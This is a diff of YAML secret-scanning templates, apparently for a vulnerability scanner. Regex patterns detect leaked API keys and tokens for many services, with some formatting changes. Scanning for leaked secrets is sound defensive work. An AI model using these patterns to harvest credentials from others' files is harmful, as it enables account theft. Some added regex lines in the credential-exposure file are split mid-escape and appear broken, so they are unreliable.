(?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/amazon/amazon-account-id.yaml b/file/keys/amazon/amazon-account-id.yaml index 34ca3c6cb0..bd4a86848f 100644 --- a/file/keys/amazon/amazon-account-id.yaml +++ b/file/keys/amazon/amazon-account-id.yaml @@ -9,12 +9,11 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: aws,amazon,token,file - file: - extensions: - all diff --git a/file/keys/amazon/amazon-mws-auth-token.yaml b/file/keys/amazon/amazon-mws-auth-token.yaml index e7ae18d486..18e1eae862 100644 --- a/file/keys/amazon/amazon-mws-auth-token.yaml +++ b/file/keys/amazon/amazon-mws-auth-token.yaml @@ -10,7 +10,6 @@ info: cvss-score: 5.3 cwe-id: CWE-200 tags: token,file,amazon,auth - file: - extensions: - all diff --git a/file/keys/amazon/amazon-session-token.yaml b/file/keys/amazon/amazon-session-token.yaml index dadcc23120..aec8d8beb9 100644 --- a/file/keys/amazon/amazon-session-token.yaml +++ b/file/keys/amazon/amazon-session-token.yaml @@ -9,12 +9,11 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: aws,amazon,token,file,session - file: - extensions: - all diff --git a/file/keys/amazon/amazon-sns-token.yaml b/file/keys/amazon/amazon-sns-token.yaml index 46e4dad006..583addce87 100644 --- a/file/keys/amazon/amazon-sns-token.yaml +++ b/file/keys/amazon/amazon-sns-token.yaml @@ -7,10 +7,9 @@ info: description: Amazon SNS token was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: file,token,amazon,aws - file: - extensions: - all diff --git a/file/keys/amazon/aws-access-id.yaml b/file/keys/amazon/aws-access-id.yaml index d39a1d5c5e..fcb664ea85 100644 --- a/file/keys/amazon/aws-access-id.yaml +++ b/file/keys/amazon/aws-access-id.yaml @@ -7,10 +7,9 @@ info: description: Amazon Web Services Access Key ID token was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: token,file - file: - extensions: - all diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml index ba3992a239..ab73cc4ac3 100644 --- a/file/keys/amazon/aws-cognito.yaml +++ b/file/keys/amazon/aws-cognito.yaml @@ -7,10 +7,9 @@ info: description: Amazon Web Services Cognito Pool ID token was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: token,file - file: - extensions: - all diff --git a/file/keys/asana/asana-clientid.yaml b/file/keys/asana/asana-clientid.yaml index 62c4909718..89d6d4ca5b 100644 --- a/file/keys/asana/asana-clientid.yaml +++ b/file/keys/asana/asana-clientid.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: asana,client,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/asana/asana-clientsecret.yaml b/file/keys/asana/asana-clientsecret.yaml index fa63975189..f331153618 100644 --- a/file/keys/asana/asana-clientsecret.yaml +++ b/file/keys/asana/asana-clientsecret.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: asana,client,file,keys,secret - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/atlassian/atlassian-api-token.yaml b/file/keys/atlassian/atlassian-api-token.yaml index 7b9af43161..aa38bfd575 100644 --- a/file/keys/atlassian/atlassian-api-token.yaml +++ b/file/keys/atlassian/atlassian-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: atlassian,file,token,api - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/azure/azure-connection-string.yaml b/file/keys/azure/azure-connection-string.yaml index 63e1b08ef4..de7c93a13a 100644 --- a/file/keys/azure/azure-connection-string.yaml +++ b/file/keys/azure/azure-connection-string.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: azure,file,token - file: - extensions: - all diff --git a/file/keys/beamer-api-token.yaml b/file/keys/beamer-api-token.yaml index e000a0b4a5..d00c90cb0d 100644 --- a/file/keys/beamer-api-token.yaml +++ b/file/keys/beamer-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: beamer,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/bitbucket/bitbucket-client-id.yaml b/file/keys/bitbucket/bitbucket-client-id.yaml index fb1a6b2891..b55d7d37b2 100644 --- a/file/keys/bitbucket/bitbucket-client-id.yaml +++ b/file/keys/bitbucket/bitbucket-client-id.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: bitbucket,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/bitbucket/bitbucket-client-secret.yaml b/file/keys/bitbucket/bitbucket-client-secret.yaml index 5320710594..c5167bf0dc 100644 --- a/file/keys/bitbucket/bitbucket-client-secret.yaml +++ b/file/keys/bitbucket/bitbucket-client-secret.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: bitbucket,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/bittrex/bittrex-access-key.yaml b/file/keys/bittrex/bittrex-access-key.yaml index 5d759a86c5..3fa09d73d1 100644 --- a/file/keys/bittrex/bittrex-access-key.yaml +++ b/file/keys/bittrex/bittrex-access-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: bittrex,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/bittrex/bittrex-secret-key.yaml b/file/keys/bittrex/bittrex-secret-key.yaml index 22927db671..50574af07f 100644 --- a/file/keys/bittrex/bittrex-secret-key.yaml +++ b/file/keys/bittrex/bittrex-secret-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: bittrex,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/branch-key.yaml b/file/keys/branch-key.yaml index 2ea4bdee4e..4d5a2514d4 100644 --- a/file/keys/branch-key.yaml +++ b/file/keys/branch-key.yaml @@ -9,10 +9,9 @@ info: - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: token,file - file: - extensions: - all diff --git a/file/keys/clojars-api-token.yaml b/file/keys/clojars-api-token.yaml index 84986e8cbc..da811a61c4 100644 --- a/file/keys/clojars-api-token.yaml +++ b/file/keys/clojars-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: clojars,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(CLOJARS_)[a-z0-9]{60} \ No newline at end of file + - (?i)(CLOJARS_)[a-z0-9]{60} diff --git a/file/keys/cloudinary.yaml b/file/keys/cloudinary.yaml index f75eda3603..5887e7c883 100644 --- a/file/keys/cloudinary.yaml +++ b/file/keys/cloudinary.yaml @@ -10,7 +10,6 @@ info: cvss-score: 7.5 cwe-id: CWE-200 tags: token,file,cloudinary - file: - extensions: - all diff --git a/file/keys/code-climate-token.yaml b/file/keys/code-climate-token.yaml index f3c43273c2..16a6be28fd 100644 --- a/file/keys/code-climate-token.yaml +++ b/file/keys/code-climate-token.yaml @@ -10,12 +10,11 @@ info: - https://github.com/codeclimate/ruby-test-reporter/issues/34 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: codeclimate,token,file - file: - extensions: - all diff --git a/file/keys/codecov-access-token.yaml b/file/keys/codecov-access-token.yaml index e6df4554b7..941ed61b8f 100644 --- a/file/keys/codecov-access-token.yaml +++ b/file/keys/codecov-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: codecov,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/coinbase-access-token.yaml b/file/keys/coinbase-access-token.yaml index 8892a9a732..ef97a5334c 100644 --- a/file/keys/coinbase-access-token.yaml +++ b/file/keys/coinbase-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: coinbase,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/confluent/confluent-access-token.yaml b/file/keys/confluent/confluent-access-token.yaml index caf2b34f3f..b0656a3b32 100644 --- a/file/keys/confluent/confluent-access-token.yaml +++ b/file/keys/confluent/confluent-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: confluent,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/confluent/confluent-secret-token.yaml b/file/keys/confluent/confluent-secret-token.yaml index dfce7ab9ff..8e75636ddf 100644 --- a/file/keys/confluent/confluent-secret-token.yaml +++ b/file/keys/confluent/confluent-secret-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: confluent,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/contentful-api-token.yaml b/file/keys/contentful-api-token.yaml index cca691374d..096286bdfb 100644 --- a/file/keys/contentful-api-token.yaml +++ b/file/keys/contentful-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: contentful,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/cratesio-api-key.yaml b/file/keys/cratesio-api-key.yaml index 1891080953..ea28d85435 100644 --- a/file/keys/cratesio-api-key.yaml +++ b/file/keys/cratesio-api-key.yaml @@ -11,12 +11,11 @@ info: - https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: crates,token,file - file: - extensions: - all diff --git a/file/keys/credential-exposure-file.yaml b/file/keys/credential-exposure-file.yaml index 1af52113c1..b6f37550b9 100644 --- a/file/keys/credential-exposure-file.yaml +++ b/file/keys/credential-exposure-file.yaml @@ -6,12 +6,10 @@ info: severity: unknown description: Check for multiple keys/tokens/passwords hidden inside of files. tags: exposure,token,file,disclosure - # Extract secrets regex like api keys, password, token, etc ... for different services. # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. # Regex count:- 687 - # Notes:- # This template requires manual inspection once found valid match. # Generic token could be anything matching below regex. @@ -19,7 +17,6 @@ info: # The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml # TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating # Example cases to match against: https://regex101.com/r/HPtaU2/1 - file: - extensions: - all @@ -28,695 +25,3443 @@ file: - type: regex part: body regex: - - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" - - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vscetoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?usertravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 